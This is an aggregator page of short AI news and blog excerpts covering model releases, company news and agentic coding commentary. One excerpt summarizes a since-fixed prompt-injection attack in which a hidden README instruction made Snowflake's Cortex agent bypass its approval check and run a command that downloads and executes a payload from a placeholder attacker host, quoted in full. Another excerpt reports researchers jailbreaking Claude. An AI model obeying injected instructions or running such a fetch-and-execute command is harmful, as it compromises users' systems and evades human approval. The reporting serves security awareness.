llm 0.29

Release: llm 0.29 Adds support for OpenAI's new models gpt-5.4, gpt-5.4-mini, and gpt-5.4-nano.

Simon Willisonblog

Snowflake Cortex AI Escapes Sandbox and Executes Malware

Snowflake Cortex AI Escapes Sandbox and Executes Malware PromptArmor report on a prompt injection attack chain in Snowflake's Cortex Agent, now fixed. The attack started when a Cortex user asked the agent to review a GitHub repository that had a prompt injection attack hidden at the bottom of the README. The attack caused the agent to execute this code: cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot)) Cortex listed cat commands as safe to run without human approval, withou

Simon Willisonblog

Quoting Tim Schilling

If you do not understand the ticket, if you do not understand the solution, or if you do not understand the feedback on your PR, then your use of LLM is hurting Django as a whole. [...] For a reviewer, it’s demoralizing to communicate with a facade of a human. This is because contributing to open source, especially Django, is a communal endeavor. Removing your humanity from that experience makes that endeavor more difficult. If you use an LLM to contribute to Django, it needs to be as a compleme

Simon Willisonblog

Autoresearching Apple's "LLM in a Flash" to run Qwen 397B locally

Autoresearching Apple's "LLM in a Flash" to run Qwen 397B locally Here's a fascinating piece of research by Dan Woods, who managed to get a custom version of Qwen3.5-397B-A17B running at 5.5+ tokens/second on a 48GB MacBook Pro M3 Max despite that model taking up 209GB (120GB quantized) on disk. Qwen3.5-397B-A17B is a Mixture-of-Experts (MoE) model, which means that each token only needs to run against a subset of the overall model weights. These expert weights can be streamed int

Simon Willisonblog

datasette 1.0a26

Release: datasette 1.0a26 Datasette now has a mechanism for assigning semantic column types. Built-in column types include url, email, and json, and plugins can register additional types using the new register_column_types() plugin hook.

Simon Willisonblog

Quoting Maggie Appleton

[...] if you ever needed another reason to learn in public by digital gardening or podcasting or streaming or whathaveyou, add on that people will assume you’re more competent than you are. This will get you invites to very cool exclusive events filled with high-achieving, interesting people, even though you have no right to be there. A+ side benefit. — Maggie Appleton, Gathering Structures (via) Tags: blogging, maggie-appleton

Simon Willisonblog

OpenAI acquires TBPN

OpenAI acquires TBPN to accelerate global conversations around AI and support independent media, expanding dialogue with builders, businesses, and the broader tech community.

OpenAI Blogblog

Quoting OpenAI Codex base_instructions

Never talk about goblins, gremlins, raccoons, trolls, ogres, pigeons, or other animals or creatures unless it is absolutely and unambiguously relevant to the user's query. — OpenAI Codex base_instructions, for GPT-5.5 Tags: openai, ai, llms, system-prompts, prompt-engineering, codex-cli, generative-ai, gpt

Simon Willisonblog

Subagents

Agentic Engineering Patterns > LLMs are restricted by their context limit - how many tokens they can fit in their working memory at any given time. These values have not increased much over the past two years even as the LLMs themselves have seen dramatic improvements in their abilities - they generally top out at around 1,000,000, and benchmarks frequently report better quality results below 200,000. Carefully managing the context such that it fits within those limits is critical to gett

Simon Willisonblog

Codex now offers more flexible pricing for teams

Codex now includes pay-as-you-go pricing for ChatGPT Business and Enterprise, providing teams a more flexible option to start and scale adoption.

OpenAI Blogblog

[AINews] Silicon Valley gets Serious about Services

A series of announcements line up to a big theme: Services are the next big opportunity.

Latent Space (swyx)blog

My fireside chat about agentic engineering at the Pragmatic Summit

I was a speaker last month at the Pragmatic Summit in San Francisco, where I participated in a fireside chat session about Agentic Engineering hosted by Eric Lui from Statsig. The video is available on YouTube. Here are my highlights from the conversation. Stages of AI adoption We started by talking about the different phases a software developer goes through in adopting AI coding tools. 02:45 I feel like there are different stages of AI adoption as a programmer. You start off with you'v

Simon Willisonblog

[AINews] A quiet April Fools

a quiet day

Latent Space (swyx)blog

Introducing Mistral Small 4

Introducing Mistral Small 4 Big new release from Mistral today (despite the name) - a new Apache 2 licensed 119B parameter (Mixture-of-Experts, 6B active) model which they describe like this: Mistral Small 4 is the first Mistral model to unify the capabilities of our flagship models, Magistral for reasoning, Pixtral for multimodal, and Devstral for agentic coding, into a single, versatile model. It supports reasoning_effort="none" or reasoning_effort="high", with the latter providing "equivale

Simon Willisonblog

Quoting Matthew Yglesias

Five months in, I think I've decided that I don't want to vibecode — I want professionally managed software companies to use AI coding assistance to make more/better/cheaper software products that they sell to me for money. — Matthew Yglesias Tags: agentic-engineering, vibe-coding, ai-assisted-programming, ai

Simon Willisonblog

How frontier enterprises are building an AI advantage

OpenAI’s B2B Signals research shows how frontier enterprises deepen AI adoption, scale Codex-powered agentic workflows, and build durable competitive advantage.

OpenAI Blogblog

Adding Benchmaxxer Repellant to the Open ASR Leaderboard

Hugging Face Blogblog

Introducing ChatGPT Futures: Class of 2026

Meet the ChatGPT Futures Class of 2026—26 student innovators using AI to build, research, and drive real-world impact. Discover how this generation is redefining learning, creativity, and opportunity with ChatGPT.

OpenAI Blogblog

Singular Bank helps bankers move fast with ChatGPT and Codex

Singular Bank built Singularity, an internal assistant using ChatGPT and Codex to help bankers save 60–90 minutes daily on meeting prep, portfolio analysis, and follow-up.

OpenAI Blogblog

Uber uses OpenAI to help people earn smarter and book faster

Uber uses OpenAI to power AI assistants and voice features that help drivers earn smarter and riders book faster across a global real-time marketplace.

OpenAI Blogblog

Quoting Jannis Leidel

GitHub’s slopocalypse – the flood of AI-generated spam PRs and issues – has made Jazzband’s model of open membership and shared push access untenable. Jazzband was designed for a world where the worst case was someone accidentally merging the wrong PR. In a world where only 1 in 10 AI-generated PRs meets project standards, where curl had to shut down its bug bounty because confirmation rates dropped below 5%, and where GitHub’s own response was a kill switch to disable pull requests entirely – a

Simon Willisonblog

GPT-5.4 mini and GPT-5.4 nano, which can describe 76,000 photos for $52

OpenAI today: Introducing GPT‑5.4 mini and nano. These models join GPT-5.4 which was released two weeks ago. OpenAI's self-reported benchmarks show the new 5.4-nano out-performing their previous GPT-5 mini model when run at maximum reasoning effort. The new mini is also 2x faster than the previous mini. Here's how the pricing looks - all prices are per million tokens. gpt-5.4-nano is notably even cheaper than Google's Gemini 3.1 Flash-Lite: Model Input Cached input

Simon Willisonblog

llm-openai-via-codex 0.1a0

Release: llm-openai-via-codex 0.1a0 Hijacks your Codex CLI credentials to make API calls with LLM, as described in my post about GPT-5.5. Tags: openai, llm, codex-cli

Simon Willisonblog

🔬Doing Vibe Physics — Alex Lupsasca, OpenAI

The full story of how GPT‑5.x derived new results in theoretical physics and quantum gravity.

Latent Space (swyx)blog

Quoting Ken Jin

Great news—we’ve hit our (very modest) performance goals for the CPython JIT over a year early for macOS AArch64, and a few months early for x86_64 Linux. The 3.15 alpha JIT is about 11-12% faster on macOS AArch64 than the tail calling interpreter, and 5-6%faster than the standard interpreter on x86_64 Linux. — Ken Jin, Python 3.15’s JIT is now back on track Tags: python

Simon Willisonblog

What's new in pip 26.1 - lockfiles and dependency cooldowns!

What's new in pip 26.1 - lockfiles and dependency cooldowns! Richard Si describes an excellent set of upgrades to Python's default pip tool for installing dependencies. This version drops support for Python 3.9 - fair enough, since it's been EOL since October. macOS still ships with python3 as a default Python 3.9, so I tried out the new Python version against Python 3.14 like this: uv python install 3.14 mkdir /tmp/experiment cd /tmp/experiment python3.14 -m venv venv source venv/bin/activ

Simon Willisonblog

Introducing talkie: a 13B vintage language model from 1930

Introducing talkie: a 13B vintage language model from 1930 New project from Nick Levine, David Duvenaud, and Alec Radford (of GPT, GPT-2, Whisper fame). talkie-1930-13b-base (53.1 GB) is a "13B language model trained on 260B tokens of historical pre-1931 English text". talkie-1930-13b-it (26.6 GB) is a checkpoint "finetuned using a novel dataset of instruction-response pairs extracted from pre-1931 reference works", designed to power a chat interface. You can try that out here. Both models are

Simon Willisonblog

1M context is now generally available for Opus 4.6 and Sonnet 4.6

1M context is now generally available for Opus 4.6 and Sonnet 4.6 Here's what surprised me: Standard pricing now applies across the full 1M window for both models, with no long-context premium. OpenAI and Gemini both charge more for prompts where the token count goes above a certain point - 200,000 for Gemini 3.1 Pro and 272,000 for GPT-5.4. Tags: ai, generative-ai, llms, anthropic, claude, llm-pricing, long-context

Simon Willisonblog

Quoting Craig Mod

Simply put: It’s a big mess, and no off-the-shelf accounting software does what I need. So after years of pain, I finally sat down last week and started to build my own. It took me about five days. I am now using the best piece of accounting software I’ve ever used. It’s blazing fast. Entirely local. Handles multiple currencies and pulls daily (historical) conversion rates. It’s able to ingest any CSV I throw at it and represent it in my dashboard as needed. It knows US and Japan tax requirement

Simon Willisonblog

microsoft/VibeVoice

microsoft/VibeVoice VibeVoice is Microsoft's Whisper-style audio model for speech-to-text, MIT licensed and with speaker diarization built into the model. Microsoft released it on January 21st, 2026 but I hadn't tried it until today. Here's a one-liner to run it on a Mac with uv, mlx-audio (by Prince Canuma) and the 5.71GB mlx-community/VibeVoice-ASR-4bit MLX conversion of the 17.3GB VibeVoice-ASR model, in this case against a downloaded copy of my recent podcast appearance with Lenny Rachitsky:

Simon Willisonblog

Holo3: Breaking the Computer Use Frontier

Hugging Face Blogblog

Tracking the history of the now-deceased OpenAI Microsoft AGI clause

For many years, Microsoft and OpenAI's relationship has included a weird clause saying that, should AGI be achieved, Microsoft's commercial IP rights to OpenAI's technology would be null and void. That clause appeared to end today. I decided to try and track its expression over time on openai.com. OpenAI, July 22nd 2019 in Microsoft invests in and partners with OpenAI to support us building beneficial AGI (emphasis mine): OpenAI is producing a sequence of increasingly powerful AI technologies,

Simon Willisonblog

Speech translation in Google Meet is now rolling out to mobile devices

Speech translation in Google Meet is now rolling out to mobile devices I just encountered this feature via a "try this out now" prompt in a Google Meet meeting. It kind-of worked! This is Google's implementation of the ultimate sci-fi translation app, where two people can talk to each other in two separate languages and Meet translates from one to the other and - with a short delay - repeats the text in your preferred language, with a rough imitation of the original speaker's voice. It can only

Simon Willisonblog

Unlocking large scale AI training networks with MRC (Multipath Reliable Connection)

OpenAI introduces MRC (Multipath Reliable Connection), a new supercomputer networking protocol released via OCP to improve resilience and performance in large-scale AI training clusters.

OpenAI Blogblog

GPT-5.5 Instant: smarter, clearer, and more personalized

GPT-5.5 Instant updates ChatGPT’s default model with smarter, more accurate answers, reduced hallucinations, and improved personalization controls.

OpenAI Blogblog

GPT-5.5 Instant System Card

OpenAI Blogblog

Shopify/liquid: Performance: 53% faster parse+render, 61% fewer allocations

Shopify/liquid: Performance: 53% faster parse+render, 61% fewer allocations PR from Shopify CEO Tobias Lütke against Liquid, Shopify's open source Ruby template engine that was somewhat inspired by Django when Tobi first created it back in 2005. Tobi found dozens of new performance micro-optimizations using a variant of autoresearch, Andrej Karpathy's new system for having a coding agent run hundreds of semi-autonomous experiments to find new effective techniques for training nanochat. Tobi's im

Simon Willisonblog

A pelican for GPT-5.5 via the semi-official Codex backdoor API

GPT-5.5 is out. It's available in OpenAI Codex and is rolling out to paid ChatGPT subscribers. I've had some preview access and found it to be a fast, effective and highly capable model. As is usually the case these days, it's hard to put into words what's good about it - I ask it to build things and it builds exactly what I ask for! There's one notable omission from today's release - the API: API deployments require different safeguards and we are working closely with partners and customers on

Simon Willisonblog

[AINews] The Claude Code Source Leak

The accidental "open sourcing" of Claude Code brings a ton of insights.

Latent Space (swyx)blog

MALUS - Clean Room as a Service

MALUS - Clean Room as a Service Brutal satire on the whole vibe-porting license washing thing (previously): Finally, liberation from open source license obligations. Our proprietary AI robots independently recreate any open source project from scratch. The result? Legally distinct code with corporate-friendly licensing. No attribution. No copyleft. No problems.. I admit it took me a moment to confirm that this was a joke. Just too on-the-nose. Via Hacker News Tags: open-source, ai,

Simon Willisonblog

Coding After Coders: The End of Computer Programming as We Know It

Coding After Coders: The End of Computer Programming as We Know It Epic piece on AI-assisted development by Clive Thompson for the New York Times Magazine, who spoke to more than 70 software developers from companies like Google, Amazon, Microsoft, Apple, plus other individuals including Anil Dash, Thomas Ptacek, Steve Yegge, and myself. I think the piece accurately and clearly captures what's going on in our industry right now in terms appropriate for a wider audience. I talked to Clive a few w

Simon Willisonblog

New ways to buy ChatGPT ads

OpenAI expands ChatGPT ads with a beta self-serve Ads Manager, CPC bidding, and enhanced measurement tools—built to protect privacy and keep conversations separate from ads.

OpenAI Blogblog

[AINews] The Other vs The Utility

a quiet day lets us reflect on the nature of AI "character" in the Clippy vs Anton debate

Latent Space (swyx)blog

Quoting Les Orchard

Here's what I think is happening: AI-assisted coding is exposing a divide among developers that was always there but maybe less visible. Before AI, both camps were doing the same thing every day. Writing code by hand. Using the same editors, the same languages, the same pull request workflows. The craft-lovers and the make-it-go people sat next to each other, shipped the same products, looked indistinguishable. The motivation behind the work was invisible because the process was identical. Now t

Simon Willisonblog

Gradient Labs gives every bank customer an AI account manager

Gradient Labs uses GPT-4.1 and GPT-5.4 mini and nano to power AI agents that automate banking support workflows with low latency and high reliability.

OpenAI Blogblog

OpenAI and PwC collaborate to reimagine the office of the CFO

OpenAI and PwC are partnering to help enterprises use AI agents to automate finance workflows, improve forecasting, strengthen controls, and modernize the CFO function.

OpenAI Blogblog

The people do not yearn for automation

The people do not yearn for automation This written and video essay by Nilay Patel explores why AI is unpopular with the general public even as usage numbers for ChatGPT continue to skyrocket. It’s a superb piece of commentary, and something I expect I’ll be thinking about for a long time to come. Nilay’s core idea is that people afflicted with “software brain” - who see the world as something to be automated as much as possible, and attempt to model everything in terms of information flows and

Simon Willisonblog

Serving the For You feed

Serving the For You feed One of Bluesky's most interesting features is that anyone can run their own custom "feed" implementation and make it available to other users - effectively enabling custom algorithms that can use any mechanism they like to recommend posts. spacecowboy runs the For You Feed, used by around 72,000 people. This guest post on the AT Protocol blog explains how it works. The architecture is fascinating. The feed is served by a single Go process using SQLite on a "gaming" PC in

Simon Willisonblog

WHY ARE YOU LIKE THIS

@scottjla on Twitter in reply to my pelican riding a bicycle benchmark: I feel like we need to stack these tests now I checked to confirm that the model (ChatGPT Images 2.0) added the "WHY ARE YOU LIKE THIS" sign of its own accord and it did - the prompt Scott used was: Create an image of a horse riding an astronaut, where the astronaut is riding a pelican that is riding a bicycle. It looks very chaotic but they all just manage to balance on top of each other Tags: text-to-image, pelic

Simon Willisonblog

Millisecond Converter

Tool: Millisecond Converter LLM reports prompt durations in milliseconds and I got fed up of having to think about how to convert those to seconds and minutes. Tags: tools

Simon Willisonblog

It's a big one

This week's edition of my email newsletter (aka content from this blog delivered to your inbox) features 4 pelicans riding bicycles, 1 possum on an e-scooter, up to 5 raccoons with ham radios hiding in crowds, 5 blog posts, 8 links, 3 quotes and a new chapter of my Agentic Engineering Patterns guide. Tags: newsletter

Simon Willisonblog

GPT-5.5 prompting guide

GPT-5.5 prompting guide Now that GPT-5.5 is available in the API, OpenAI have released a wealth of useful tips on how best to prompt the new model. Here's a neat trick they recommend for applications that might spend considerable time thinking before returning a user-visible response: Before any tool calls for a multi-step task, send a short user-visible update that acknowledges the request and states the first step. Keep it to one or two sentences. I've already noticed their Codex app doing t

Simon Willisonblog

Extract PDF text in your browser with LiteParse for the web

LlamaIndex have a most excellent open source project called LiteParse, which provides a Node.js CLI tool for extracting text from PDFs. I got a version of LiteParse working entirely in the browser, using most of the same libraries that LiteParse uses to run in Node.js. Spatial text parsing Refreshingly, LiteParse doesn't use AI models to do what it does: it's good old-fashioned PDF parsing, falling back to Tesseract OCR (or other pluggable OCR engines) for PDFs that contain images of text rather

Simon Willisonblog

russellromney/honker

russellromney/honker "Postgres NOTIFY/LISTEN semantics" for SQLite, implemented as a Rust SQLite extension and various language bindings to help make use of it. The design of this looks very solid. It lets you write Python code for queues that looks like this: import honker db = honker.open("app.db") emails = db.queue("emails") emails.enqueue({"to": "alice@example.com"}) # Consume (in a worker process) async for job in emails.claim("worker-1"): send(job.payload) job.ack() And Kafka-sty

Simon Willisonblog

An update on recent Claude Code quality reports

An update on recent Claude Code quality reports It turns out the high volume of complaints that Claude Code was providing worse quality results over the past two months was grounded in real problems. The models themselves were not to blame, but three separate issues in the Claude Code harness caused complex but material problems which directly affected users. Anthropic's postmortem describes these in detail. This one in particular stood out to me: On March 26, we shipped a change to clear Claud

Simon Willisonblog

Quoting Romain Huet

Since GPT-5.4, we’ve unified Codex and the main model into a single system, so there’s no separate coding line anymore. GPT-5.5 takes this further, with strong gains in agentic coding, computer use, and any task on a computer. — Romain Huet, confirming OpenAI won't release a GPT-5.5-Codex model Tags: generative-ai, gpt, openai, ai, llms

Simon Willisonblog

llm 0.31

Release: llm 0.31 New GPT-5.5 OpenAI model: llm -m gpt-5.5. #1418 New option to set the text verbosity level for GPT-5+ OpenAI models: -o verbosity low. Values are low, medium, high. New option for setting the image detail level used for image attachments to OpenAI models: -o image_detail low - values are low, high and auto, and GPT-5.4 and 5.5 also accept original. Models listed in extra-openai-models.yaml are now also registered as asynchronous. #1395 Tags: gpt, o

Simon Willisonblog

Sorting algorithms

Sorting algorithms Today in animated explanations built using Claude: I've always been a fan of animated demonstrations of sorting algorithms so I decided to spin some up on my phone using Claude Artifacts, then added Python's timsort algorithm, then a feature to run them all at once. Here's the full sequence of prompts: Interactive animated demos of the most common sorting algorithms This gave me bubble sort, selection sort, insertion sort, merge sort, quick sort, and heap sort. Add timsort,

Simon Willisonblog

Accelerating the next phase of AI

OpenAI raises $122 billion in new funding to expand frontier AI globally, invest in next-generation compute, and meet growing demand for ChatGPT, Codex, and enterprise AI.

OpenAI Blogblog

DeepSeek V4 - almost on the frontier, a fraction of the price

Chinese AI lab DeepSeek's last model release was V3.2 (and V3.2 Speciale) last December. They just dropped the first of their hotly anticipated V4 series in the shape of two preview models, DeepSeek-V4-Pro and DeepSeek-V4-Flash. Both models are 1 million token context Mixture of Experts. Pro is 1.6T total parameters, 49B active. Flash is 284B total, 13B active. They're using the standard MIT license. I think this makes DeepSeek-V4-Pro the new largest open weights model. It's larger than Kimi K2.

Simon Willisonblog

Quoting John Carmack

It is hard for less experienced developers to appreciate how rarely architecting for future requirements / applications turns out net-positive. — John Carmack, a tweet in June 2021 Tags: john-carmack, software-engineering, yagni

Simon Willisonblog

How OpenAI delivers low-latency voice AI at scale

How OpenAI rebuilt its WebRTC stack to power real-time Voice AI with low latency, global scale, and seamless conversational turn-taking.

OpenAI Blogblog

[AINews] The Last 4 Jobs in Tech

a quiet day lets us examine an interesting mental model

Latent Space (swyx)blog

AI should help us produce better code

Agentic Engineering Patterns > Many developers worry that outsourcing their code to AI tools will result in a drop in quality, producing bad code that's churned out fast enough that decision makers are willing to overlook its flaws. If adopting coding agents demonstrably reduces the quality of the code and features you are producing, you should address that problem directly: figure out which aspects of your process are hurting the quality of your output and fix them. Shipping worse code w

Simon Willisonblog

Mistral: Voxtral TTS, Forge, Leanstral, & what's next for Mistral 4 — w/ Pavan Kumar Reddy & Guillaume Lample

Mistral is one of the world's leading frontier model labs, and has just launched Voxtral TTS, their latest step in their strategy to offer open frontier intelligence for every modality.

Latent Space (swyx)blog

Production query plans without production data

Production query plans without production data Radim Marek describes the new pg_restore_relation_stats() and pg_restore_attribute_stats() functions that were introduced in PostgreSQL 18 in September 2025. The PostgreSQL query planner makes use of internal statistics to help it decide how to best execute a query. These statistics often differ between production data and development environments, which means the query plans used in production may not be replicable in development. PostgreSQL's new

Simon Willisonblog

Helping disaster response teams turn AI into action across Asia

AI for Disaster Response in Asia: OpenAI Workshop with Gates Foundation

OpenAI Blogblog

[AINews] AI Engineer World's Fair — Autoresearch, Memory, World Models, Tokenmaxxing, Agentic Commerce, and Vertical AI Call for Speakers

a quiet day lets us make a call for speakers!

Latent Space (swyx)blog

AI evals are becoming the new compute bottleneck

Hugging Face Blogblog

[AINews] Agents for Everything Else: Codex for Knowledge Work, Claude for Creative Work

a quiet day lets us reflect on coding agents "breaking containment"

Latent Space (swyx)blog

[AINews] H100 prices are melting UP

a quiet day lets us report an important GPU trend

Latent Space (swyx)blog

STADLER reshapes knowledge work at a 230-year-old company

Learn how STADLER uses ChatGPT to transform knowledge work, saving time and accelerating productivity across 650 employees.

OpenAI Blogblog

What's New in Mellea 0.4.0 + Granite Libraries Release

Hugging Face Blogblog

Step by Step Guide to Build an End-to-End Model Optimization Pipeline with NVIDIA Model Optimizer Using FastNAS Pruning and Fine-Tuning

In this tutorial, we build a complete end-to-end pipeline using NVIDIA Model Optimizer to train, prune, and fine-tune a deep learning model directly in Google Colab. We start by setting up the environment and preparing the CIFAR-10 dataset, then define a ResNet architecture and train it to establish a strong baseline. From there, we apply […] The post Step by Step Guide to Build an End-to-End Model Optimization Pipeline with NVIDIA Model Optimizer Using FastNAS Pruning and Fine-Tuning appe

MarkTechPostblog

Google Releases Gemini 3.1 Flash Live: A Real-Time Multimodal Voice Model for Low-Latency Audio, Video, and Tool Use for AI Agents

Google has released Gemini 3.1 Flash Live in preview for developers through the Gemini Live API in Google AI Studio. This model targets low-latency, more natural, and more reliable real-time voice interactions, serving as Google’s ‘highest-quality audio and speech model to date.’ By natively processing multimodal streams, the release provides a technical foundation for building […] The post Google Releases Gemini 3.1 Flash Live: A Real-Time Multimodal Voice Model for Low-Latenc

MarkTechPostblog

Anthropic wins injunction against Trump administration over Defense Department saga

A federal judge has ordered that the Trump administration rescind recent restrictions it placed on the AI company.

TechCrunch AIblog

[AINews] The Inference Inflection

a quiet day lets us reflect on the growing implications of the inference age

Latent Space (swyx)blog

Judge sides with Anthropic to temporarily block the Pentagon’s ban

After Anthropic's weeks-long standoff with the Pentagon, the company won one milestone: A judge granted Anthropic a preliminary injunction in its lawsuit, which sought to reverse its government blacklisting while the judicial process plays out. "The Department of War's records show that it designated Anthropic as a supply chain risk because of its 'hostile manner […]

The Verge AIblog

Introducing Advanced Account Security

Introducing Advanced Account Security: phishing-resistant login, stronger recovery, and enhanced protections to safeguard sensitive data and prevent account takeover.

OpenAI Blogblog

You can now transfer your chats and personal information from other chatbots directly into Gemini

Google is launching "switching tools" that, just as it sounds, will make it easier for users of other chatbots to switch to Gemini.

TechCrunch AIblog

David Sacks is no longer the White House AI and Crypto Czar

David Sacks, the venture capitalist and tech billionaire who'd become Silicon Valley's primary advocate inside the White House and a key architect of its aggressive AI policy initiatives, revealed on Thursday that he was no longer a special government employee - and therefore no longer President Donald Trump's Special Advisor on AI and Crypto. Sacks' […]

The Verge AIblog

A Coding Implementation to Run Qwen3.5 Reasoning Models Distilled with Claude-Style Thinking Using GGUF and 4-Bit Quantization

In this tutorial, we work directly with Qwen3.5 models distilled with Claude-style reasoning and set up a Colab pipeline that lets us switch between a 27B GGUF variant and a lightweight 2B 4-bit version with a single flag. We start by validating GPU availability, then conditionally install either llama.cpp or transformers with bitsandbytes, depending on […] The post A Coding Implementation to Run Qwen3.5 Reasoning Models Distilled with Claude-Style Thinking Using GGUF and 4-Bit Quantizatio

MarkTechPostblog

Musk’s biggest loyalist became his biggest liability

I sat down in the Musk v. Altman trial courtroom today, painfully aware that no one was going to ask Shivon Zilis the question on everyone's minds: Girl, what the fuck are you doing? Zilis, who testified under oath that she is the mother of four of Musk's children, was… what's the best way to […]

The Verge AIblog

[AINews] Everything is CLI

a quiet day lets us reflect on the growing trend of CLIs for ~everything~ agents

Latent Space (swyx)blog

A Groq-Powered Agentic Research Assistant with LangGraph, Tool Calling, Sub-Agents, and Agentic Memory: Lets Built It

In this tutorial, we build a Groq-powered agentic research workflow that runs directly using Groq’s free OpenAI-compatible inference endpoint The post A Groq-Powered Agentic Research Assistant with LangGraph, Tool Calling, Sub-Agents, and Agentic Memory: Lets Built It appeared first on MarkTechPost.

MarkTechPostblog

Wikipedia cracks down on the use of AI in article writing

The site, whose policies are subject to change, has struggled with the issue of AI-generated writing.

TechCrunch AIblog

Google is making it easier to import another AI’s memory into Gemini

After Anthropic updated its tool for copying another AI's memory into Claude earlier this month, Google Gemini is rolling out new "Import Memory" and "Import Chat History" features on desktop that can help users quickly copy over everything their current AI already knows about them. To use the "Import Memory" tool, users copy and paste […]

The Verge AIblog

Apple will reportedly allow other AI chatbots to plug into Siri

Apple's iOS 27 update will allow users to choose the AI chatbot they want to link with Siri. That's according to a report from Bloomberg's Mark Gurman, who says third-party chatbots downloaded from the App Store, like Google's Gemini or Anthropic's Claude, will be able to fetch replies for Siri - similar to how the […]

The Verge AIblog

Where the goblins came from

How goblin outputs spread in AI models: timeline, root cause, and fixes behind personality-driven quirks in GPT-5 behavior.

OpenAI Blogblog

Barry Diller trusts Sam Altman. But ‘trust is irrelevant’ as AGI nears, he says.

Barry Diller defended OpenAI CEO Sam Altman, while warning that AGI remains an unpredictable force needing guardrails.

TechCrunch AIblog

Snap says its $400M deal with Perplexity ‘amicably ended’

The deal, announced last November, would have seen Perplexity's AI search engine integrated directly into Snapchat.

TechCrunch AIblog

Apple’s AI Playlist Playground is bad at music

Apple Music: "What do you want to hear?" Me: "Atmospheric instrumental black metal to write to." Apple Music: "Here's three metal songs with vocals, a field recording, an ambient electronic track, and a piece of doom jazz." I am skeptical of AI's ability to serve up the music I want to begin with, but even […]

The Verge AIblog

Is xAI a neocloud now?

xAI's real business may be more about building data centers than training AI models.

TechCrunch AIblog

Google’s AI architect lived rent-free in Elon Musk’s head

About a week into the Musk v. Altman trial, we've heard from some of the most powerful people in tech - including OpenAI president Greg Brockman, Elon Musk's fixer Jared Birchall, and Musk himself. But one of the most prominent characters is hovering around the margins: Demis Hassabis, CEO of Google DeepMind. Hassabis is the […]

The Verge AIblog

Researchers gaslit Claude into giving instructions to build explosives

Anthropic has spent years building itself up as the safe AI company. But new security research shared with The Verge suggests Claude's carefully crafted helpful personality may itself be a vulnerability. Researchers at AI red-teaming company Mindgard say they got Claude to offer up erotica, malicious code, and instructions for building explosives, and other prohibited […]

The Verge AIblog

EU backs nude app ban and delays to landmark AI rules

European lawmakers have voted to delay key parts of the EU AI Act, the bloc's flagship law for regulating artificial intelligence, while also backing proposals to ban nudify apps. The measures, approved by a large majority in the European Parliament, would push back compliance deadlines for developers of high-risk AI systems - those deemed to […]

The Verge AIblog

Google shuts down Project Mariner

Google has pulled the plug on Project Mariner, an experimental feature designed to perform tasks for you across the web, as reported earlier by Wired's Maxwell Zeff. The Project Mariner landing page now contains a message that says: "Thank you for using Project Mariner. It was shut down on May 4th, 2026 and its technology […]

The Verge AIblog

CopilotKit Introduces Enterprise Intelligence Platform That Gives Agentic Applications Persistent Memory Across Sessions and Devices

CopilotKit Intelligence adds a managed persistence layer on top of the open-source CopilotKit stack, giving agents the ability to retain context, state, and interaction history without custom storage infrastructure The post CopilotKit Introduces Enterprise Intelligence Platform That Gives Agentic Applications Persistent Memory Across Sessions and Devices appeared first on MarkTechPost.

MarkTechPostblog

OpenAI shelves erotic chatbot ‘indefinitely’

OpenAI has paused plans to release a sexualized "adult mode" for ChatGPT, in its latest move to refocus on the company's core products. According to The Financial Times, the erotic chatbot has been shelved "indefinitely" after facing pushback from employees and investors due to the problematic and harmful effects sexualized AI content can have on […]

The Verge AIblog

How David Sacks crashed and burned in the White House

Hello and welcome to Regulator, a newsletter exclusively for Verge subscribers about tech, politics, and Washington intrigue. (It's basically House of Cards, but for nerds.) Not a subscriber yet? You really should become one, and to save you a Google search, here is the direct link to do so! And do you think I should […]

The Verge AIblog

Arcee AI Releases Trinity Large Thinking: An Apache 2.0 Open Reasoning Model for Long-Horizon Agents and Tool Use

The landscape of open-source artificial intelligence has shifted from purely generative models toward systems capable of complex, multi-step reasoning. While proprietary ‘reasoning’ models have dominated the conversation, Arcee AI has released Trinity Large Thinking. This release is an open-weight reasoning model distributed under the Apache 2.0 license, positioning it as a transparent alternative for developers […] The post Arcee AI Releases Trinity Large Thinking: An Apache 2

MarkTechPostblog

Google’s ‘live’ AI search assistant can handle conversations in dozens more languages

Google is expanding access to Search Live, a feature that lets you search for information using your voice and camera. The AI search assistant is now available in more than 200 countries and territories, as well as dozens of languages, according to an announcement on Thursday. Search Live rolled out broadly in the US last […]

The Verge AIblog

OpenAI abandons yet another side quest: ChatGPT’s erotic mode

It's only the latest of several side projects that the AI startup has ditched over the past week.

TechCrunch AIblog

OpenAI’s president does ‘all the things,’ except answer a question

The strongest witness for Elon Musk's case against OpenAI so far has been Greg Brockman's journal. Brockman himself is running as a close second. Brockman was called to the stand in a rather unusual way - he was cross-examined first, followed by a direct examination - and he had some serious high school debate club […]

The Verge AIblog

Data centers get ready — the Senate wants to see your power bills

Senators Josh Hawley and Elizabeth Warren want the Energy Information Administration to gather more details about how data centers use power — and how that affects the grid.

TechCrunch AIblog

Granite 4.1 LLMs: How They’re Built

Hugging Face Blogblog

My Workflow for Understanding LLM Architectures

A learning-oriented workflow for understanding new open-weight model releases

Sebastian Raschkablog

Building the compute infrastructure for the Intelligence Age

OpenAI scales Stargate to build the compute infrastructure powering AGI, adding new data center capacity to meet growing AI demand.

OpenAI Blogblog

How Elon Musk left OpenAI, according to Greg Brockman

Cutthroat negotiations between startup founders are rarely shared so publicly, especially when a company becomes as world-changing as OpenAI.

TechCrunch AIblog

Showing 200 items

Weekly AI open-source movers

Get the fastest-growing projects, useful MCP servers, and technical reads in one weekly email.